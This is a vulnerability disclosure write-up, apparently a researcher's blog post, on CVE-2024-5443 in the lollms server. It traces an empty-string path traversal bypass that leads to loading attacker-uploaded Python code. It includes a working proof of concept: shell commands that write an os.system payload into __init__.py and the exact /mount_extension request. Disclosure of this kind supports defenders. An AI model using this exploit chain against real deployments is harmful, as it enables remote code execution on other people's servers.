Introduction

Hello everyone! I am Nhien Pham, aka nhienit. Today, I would like to share the story of CVE-2024-5443, a vulnerability I discovered in a product called parisneo/lollms and reported through huntr (a bug bounty platform for AI/ML). Here’s how I uncovered and reported it.

Product Overview

Lord of Large Language Models (LoLLMs) Server is a text generation server based on large language models. It provides a Flask-based API for generating text using various pre-trained language models. This server is designed to be easy to install and use, allowing developers to integrate powerful text generation capabilities into their applications. (Details at: https://github.com/ParisNeo/lollms-webui).

Vulnerability Summary

The security patch for previous vulnerabilities was insufficient: attackers can bypass it with an empty string and exploit a Path Traversal vulnerability. This makes it possible to set extension_path to any directory through the lollmsElfServer configuration and then trigger the ExtensionBuilder().build_extension() function to load malicious code uploaded by the attacker.

Background



Even before I discovered this vulnerability, you can see that there have been many Path Traversal vulnerabilities (including mine) reported and listed on Hacktivity on huntr. Below is an illustrative image.

Therefore, the prevention mechanisms for this type of vulnerability are continuously improving and frequently updated.

Among them, the file lollms/security.py contains functions to check and detect malicious inputs received from users.

    # lollms/security.py
    # ... more code

    def sanitize_path(path:str, allow_absolute_path:bool=False, error_text="Absolute database path detected", exception_text="Detected an attempt of path traversal. Are you kidding me?"):
        # Prevent path traversal
        # ...

    def sanitize_path_from_endpoint(path: str, error_text="A suspected LFI attack detected. The path sent to the server has suspicious elements in it!", exception_text="Invalid path!"):
        # Prevent path traversal too
        # ...

    def check_access(lollmsElfServer, client_id):
        # check access
        # ...

    def forbid_remote_access(lollmsElfServer, exception_text = "This functionality is forbidden if the server is exposed"):
        # ...

These prevention functions are called in most endpoints within the application to control the input.

    # lollms_core\lollms\server\endpoints\lollms_personalities_infos.py
    # ... more code

    @router.post("/reinstall_personality")
    async def reinstall_personality(personality_in: PersonalityIn):
        check_access(lollmsElfServer, personality_in.client_id)
        try:
            sanitize_path(personality_in.name)
            if not personality_in.name:
                # ...

    @router.post("/get_personality_config")
    def get_personality_config(data:PersonalityDataRequest):
        print("- Recovering personality config")
        category = sanitize_path(data.category)
        name = sanitize_path(data.name)
        # ...

All the tricks used for exploitation in previous reports have been patched. Therefore, I decided to dig deeper into this mechanism to find a way to bypass it.

Analyzing the Vulnerability in Detail

Bypass the filter

Before delving deeper and identifying the actual vulnerability, I first looked at the function behind the /get_personality_config endpoint, which is defined as follows:

    # lollms_core\lollms\server\endpoints\lollms_personalities_infos.py
    # ... more code

    @router.post("/get_personality_config")
    def get_personality_config(data:PersonalityDataRequest):
        print("- Recovering personality config")
        category = sanitize_path(data.category) # [1]
        name = sanitize_path(data.name) # [2]
        package_path = f"{category}/{name}" # [3]
        if category=="custom_personalities":
            # ...
        else:
            package_full_path = lollmsElfServer.lollms_paths.personalities_zoo_path/package_path # [4]
        config_file = package_full_path / "config.yaml"
        if config_file.exists():
            with open(config_file,"r") as f:
                config = yaml.safe_load(f)
            return {"status":True, "config":config}
        # ...

At [1] and [2], the data.category and data.name values are user-controllable, and both are passed through the sanitize_path() filter:

    def sanitize_path(path:str, allow_absolute_path:bool=False, error_text="Absolute database path detected", exception_text="Detected an attempt of path traversal. Are you kidding me?"):
        if path is None:
            return path

        # Regular expression to detect patterns like "...." and multiple forward slashes
        suspicious_patterns = re.compile(r'(\.\.+)|(/+/)')

        if suspicious_patterns.search(str(path)) or ((not allow_absolute_path) and Path(path).is_absolute()):
            ASCIIColors.error(error_text)
            raise HTTPException(status_code=400, detail=exception_text)

        if not allow_absolute_path:
            path = path.lstrip('/')

        return path

As we can clearly see, the filter tightly controls the use of special characters to prevent escaping from the default path, so inputs starting with payloads like ../ , / , \ , ... and paths considered absolute are detected. At [3], the two values data.category and data.name are concatenated with a / separator, and at [4] the result is appended to the default path that users are allowed to access. In Python, we can join a Path object with a string using the / operator, for example:

    >>> from pathlib import Path
    >>> a = Path("/home/user/public/")
    >>> b = "etc/passwd"
    >>> a/b
    PosixPath('/home/user/public/etc/passwd')

However, if the appended string starts with a path separator (that is, it is an absolute path), the preceding path is discarded:

    >>> from pathlib import Path
    >>> a = Path("/home/user/public/")
    >>> b = "/etc/passwd"
    >>> a/b
    PosixPath('/etc/passwd')

Therefore, the vulnerability here is that the data.category and data.name values are not checked for empty strings. With an empty category, the / separator inserted at [3] becomes the first character of package_path, which turns it into an absolute path whose remainder is fully controlled by the second value:

    >>> category = ""
    >>> name = "tmp/hacked"
    >>> package_path = f"{category}/{name}"
    >>> package_path
    '/tmp/hacked'
    >>> package_full_path = Path("/home/user/public/")/package_path
    >>> package_full_path
    PosixPath('/tmp/hacked')

Excellent, at this point I can confirm that I have bypassed the filter. However, at the /get_personality_config endpoint, exploiting Path Traversal doesn't seem to create a significant issue, so I need to review other functions.
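The bypass can be reproduced outside the application with a small script. This is only a sketch under stated assumptions: simplified_sanitize_path() is a hypothetical stand-in that mirrors the filter quoted above but raises ValueError instead of HTTPException, PurePosixPath is used so the result does not depend on the operating system, and the base directory and the generic/lollms names are made up for illustration.

```python
import re
from pathlib import PurePosixPath

# Same pattern as in the filter quoted above
SUSPICIOUS = re.compile(r'(\.\.+)|(/+/)')


def simplified_sanitize_path(path, allow_absolute_path=False):
    """Hypothetical stand-in for sanitize_path(); raises ValueError on rejection."""
    if path is None:
        return path
    if SUSPICIOUS.search(str(path)) or (
        not allow_absolute_path and PurePosixPath(path).is_absolute()
    ):
        raise ValueError("Detected an attempt of path traversal")
    if not allow_absolute_path:
        path = path.lstrip('/')
    return path


def build_package_path(base, category, name):
    """Mirror steps [1] to [4]: sanitize both values, join them with '/', append to base."""
    category = simplified_sanitize_path(category)
    name = simplified_sanitize_path(name)
    return PurePosixPath(base) / f"{category}/{name}"


base = "/home/user/public"  # illustrative base directory

# A normal request stays under the base directory
normal = build_package_path(base, "generic", "lollms")

# An empty category makes the joined string start with "/",
# so the base directory is discarded by the path join
escaped = build_package_path(base, "", "tmp/hacked")

print(normal)   # /home/user/public/generic/lollms
print(escaped)  # /tmp/hacked
```

Neither the empty string nor tmp/hacked contains anything the filter looks for; the absolute path only comes into existence after both values have been checked individually.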

More impact, more money

After reviewing previously disclosed vulnerabilities, I found CVE-2024-4320, described in great detail by another huntr researcher, retr0reg (see details at: https://huntr.com/bounties/d6564f04-0f59-4686-beb2-11659342279b). In that vulnerability, an attacker abuses Path Traversal at the /install_extension endpoint to point the extension_path variable at a location where they have uploaded malicious code, and the ExtensionBuilder().build_extension() function then loads that code.

Upon quick inspection, the vulnerability has been patched at the /install_extension endpoint, but I discovered that I can indirectly execute the ExtensionBuilder().build_extension() function through the lollmsElfServer.rebuild_extensions() function of another endpoint, /mount_extension.

    # lollms_core\lollms\server\endpoints\lollms_extensions_infos.py
    # ... more code

    @router.post("/mount_extension")
    def mount_extension(data:ExtensionMountingInfos):
        print("- Mounting extension")
        category = sanitize_path(data.category)
        name = sanitize_path(data.folder)
        package_path = f"{category}/{name}"
        package_full_path = lollmsElfServer.lollms_paths.extensions_zoo_path/package_path
        config_file = package_full_path / "config.yaml" # [5]
        if config_file.exists():
            lollmsElfServer.config["extensions"].append(package_path) # [6]
            lollmsElfServer.mounted_extensions = lollmsElfServer.rebuild_extensions() # [7]
        # ...

As described above, we can bypass the filter and point package_full_path at a path of our choosing. At [5], the code checks whether a config.yaml file exists in that folder; if it does, package_path is appended at [6] to the list of extensions stored in lollmsElfServer.config["extensions"]. At [7], the lollmsElfServer.rebuild_extensions() function is executed as follows:

    # lollms_webui.py
    # ... more code

    class LOLLMSWebUI(LOLLMSElfServer):
        def rebuild_extensions(self, reload_all=False):
            # ...
            for i,extension in enumerate(self.config['extensions']):
                # ...
                if extension in loaded_names:
                    # ...
                else:
                    extension_path = self.lollms_paths.extensions_zoo_path/f"{extension}"
                    try:
                        extension = ExtensionBuilder().build_extension(extension_path,self.lollms_paths, self)
                    # ...

Here, it iterates over every entry in the config (including the one added at [6]), builds an extension_path from it, and loads it through the ExtensionBuilder().build_extension() function.
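To see why the stored value still points outside the extensions folder when it is read back, here is a minimal sketch of the path arithmetic alone. The extensions_zoo_path value is a hypothetical placeholder and the config is reduced to a plain list; only the joins mirror the code quoted above.

```python
from pathlib import PurePosixPath

# Hypothetical location of the extensions folder
extensions_zoo_path = PurePosixPath("/srv/lollms/extensions_zoo")

# mount_extension: an empty category makes package_path start with "/"
category, folder = "", "tmp/hacked"
package_path = f"{category}/{folder}"
config_extensions = [package_path]  # what ends up stored at [6]

# rebuild_extensions: each stored entry is joined with the zoo path again
extension_path = extensions_zoo_path / f"{config_extensions[0]}"

# Any further join with the zoo path leaves the absolute path unchanged
joined_again = extensions_zoo_path / extension_path

print(package_path)    # /tmp/hacked
print(extension_path)  # /tmp/hacked
print(joined_again)    # /tmp/hacked
```

Because the stored string is already absolute, every later join with the extensions folder is a no-op, so the attacker-chosen directory is what finally reaches build_extension().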

    # lollms_core\lollms\extension.py
    # ... more code

    class ExtensionBuilder:
        def build_extension(
            self,
            extension_path:str,
            lollms_paths:LollmsPaths,
            app,
            installation_option:InstallOption=InstallOption.INSTALL_IF_NECESSARY
        )->LOLLMSExtension:
            extension, script_path = self.getExtension(extension_path, lollms_paths, app) # [8]
            return extension(app = app, installation_option = installation_option)

        def getExtension(
            self,
            extension_path:str,
            lollms_paths:LollmsPaths,
            app
        )->LOLLMSExtension:
            extension_path = lollms_paths.extensions_zoo_path / extension_path
            # define the full absolute path to the module
            absolute_path = extension_path.resolve()
            # infer the module name from the file path
            module_name = extension_path.stem
            # use importlib to load the module from the file path
            loader = importlib.machinery.SourceFileLoader(module_name, str(absolute_path / "__init__.py")) # [9]
            extension_module = loader.load_module()
            extension:LOLLMSExtension = getattr(extension_module, extension_module.extension_name)
            return extension, absolute_path

When the ExtensionBuilder().build_extension() function is executed, it calls the ExtensionBuilder().getExtension() function at [8]. Since extension_path is always the absolute path value that we provide, we can easily control the value of the absolute_path variable as desired. Additionally, at [9], the ExtensionBuilder().getExtension() function looks for the __init__.py file in the path provided by the attacker and loads the code inside this file.
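Loading a module from a file runs every top-level statement in that file, which is why reaching [9] with an attacker-controlled directory amounts to code execution. The sketch below illustrates this with a harmless payload. It is an assumption-laden illustration, not the application's code: load_package_init() is a hypothetical helper, and it uses importlib.util.spec_from_file_location() with exec_module() rather than the load_module() call quoted above.

```python
import importlib.util
import tempfile
from pathlib import Path


def load_package_init(directory: Path):
    """Hypothetical helper: load directory/__init__.py as a module from its file path."""
    init_file = directory / "__init__.py"
    spec = importlib.util.spec_from_file_location(directory.stem, init_file)
    module = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(module)  # top-level statements of the file run here
    return module


with tempfile.TemporaryDirectory() as tmp:
    uploaded_dir = Path(tmp) / "uploaded"
    uploaded_dir.mkdir()

    # Harmless stand-in for an uploaded payload: it only sets a flag
    (uploaded_dir / "__init__.py").write_text("executed = True\n")

    module = load_package_init(uploaded_dir)
    side_effect_seen = module.executed

print(side_effect_seen)  # True
```

The flag is set as a side effect of loading alone; nothing in the file has to be called explicitly.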

Exploit Conditions

- Must know discussion_id

- Must know the path to the personal_data folder

Proof-of-Concept

To exploit this vulnerability, we first need to create a conversation.



Create two files called config.yaml and __init__.py as shown below:

    $ echo "import os; os.system('calc.exe');" > __init__.py
    $ echo "FOOOO" > config.yaml

Then upload the config.yaml and __init__.py files through the Send file to AI function.



Send the request shown below to execute an OS command.

    POST /mount_extension HTTP/1.1
    Host: localhost:1337
    Content-Type: application/json
    Content-Length: 177

    {
      "category": "",
      "folder": "/path/to/personal_data/discussion_databases/default/<discussion_id>/text_data",
      "client_id": "jg9yock1FmRZdONsAAAH",
      "language": "vi"
    }

Here, discussion_id can be easily guessed through brute force because it is an integer value.





The Patch

I quickly reported this vulnerability on huntr, and the vendor promptly acknowledged it. The vendor then patched the vulnerability by removing these dangerous functions.
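For code that does need to join user input onto a base directory, a common hardening pattern is to validate the final resolved path rather than each component on its own. The sketch below is a general illustration and not the vendor's patch; safe_join() is a hypothetical helper, and Path.is_relative_to() requires Python 3.9 or later.

```python
import tempfile
from pathlib import Path


def safe_join(base: Path, *parts: str) -> Path:
    """Hypothetical helper: join parts under base and refuse anything that escapes it."""
    # Reject empty components, which is what enabled the bypass described above
    if any(part is None or part.strip() == "" for part in parts):
        raise ValueError("empty path component")
    base = base.resolve()
    candidate = base.joinpath(*parts).resolve()
    # Check the final result, not the individual inputs
    if not candidate.is_relative_to(base):
        raise ValueError("path escapes the base directory")
    return candidate


with tempfile.TemporaryDirectory() as tmp:
    base = Path(tmp)

    accepted = safe_join(base, "category", "name")
    accepted_ok = accepted == base.resolve() / "category" / "name"

    rejected = []
    for parts in [("", "tmp/hacked"), ("category", "/etc/passwd"), ("category", "../../etc")]:
        try:
            safe_join(base, *parts)
        except ValueError:
            rejected.append(parts)

print(accepted_ok)    # True
print(len(rejected))  # 3
```

Checking the resolved result means the decision no longer depends on anticipating every input trick ahead of the join.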

Conclusion

Discovering this vulnerability was an exciting process for me. It taught me new techniques for exploiting vulnerabilities by thoroughly examining application source code, and it contributed to making applications safer. Additionally, I would like to thank huntr for creating such an interesting platform, which allows those of us who enjoy auditing code to develop our skills and share our findings with the community.
